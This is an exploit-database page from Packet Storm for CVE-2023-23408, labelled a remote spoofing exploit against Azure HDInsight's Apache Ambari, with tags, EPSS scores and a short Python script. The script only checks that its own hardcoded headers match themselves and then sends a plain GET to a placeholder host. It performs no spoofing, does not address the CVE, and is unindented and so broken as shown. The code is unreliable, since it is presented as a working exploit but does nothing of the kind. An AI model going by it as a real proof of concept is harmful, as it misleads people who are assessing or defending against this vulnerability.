Lucene search

Amirhossein BahramizadehPACKETSTORM:173134

HistoryJun 27, 2023 - 12:00 a.m.

Azure Apache Ambari 2302250400 Spoofing

2023-06-2700:00:00

Amirhossein Bahramizadeh

packetstormsecurity.com

120

azure

apache ambari

spoofing

vulnerability

exploit

remote

microsoft

hdinsights

cve-2023-23408

request

validation

header

security

0.001 Low

EPSS

Percentile

33.7%

JSON

`# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing  
# Date: 2023-06-23  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : Remote  
# Vendor Homepage:  
Microsoft  
Apache Ambari  
Microsoft azure Hdinsights  
# Tested on: Windows/Linux  
# CVE : CVE-2023-23408  
  
import requests  
  
# Set the URL and headers for the Ambari web interface  
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"  
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}  
  
# Define a function to validate the headers  
def validate_headers(headers):  
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":  
return False  
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":  
return False  
return True  
  
# Define a function to send a request to the Ambari web interface  
def send_request(url, headers):  
if not validate_headers(headers):  
print("Invalid headers")  
return  
response = requests.get(url, headers=headers)  
if response.status_code == 200:  
print("Request successful")  
else:  
print("Request failed")  
  
# Call the send_request function with the URL and headers  
send_request(url, headers)  
  
  
`

0.001 Low

EPSS

Percentile

33.7%

JSON

Related for PACKETSTORM:173134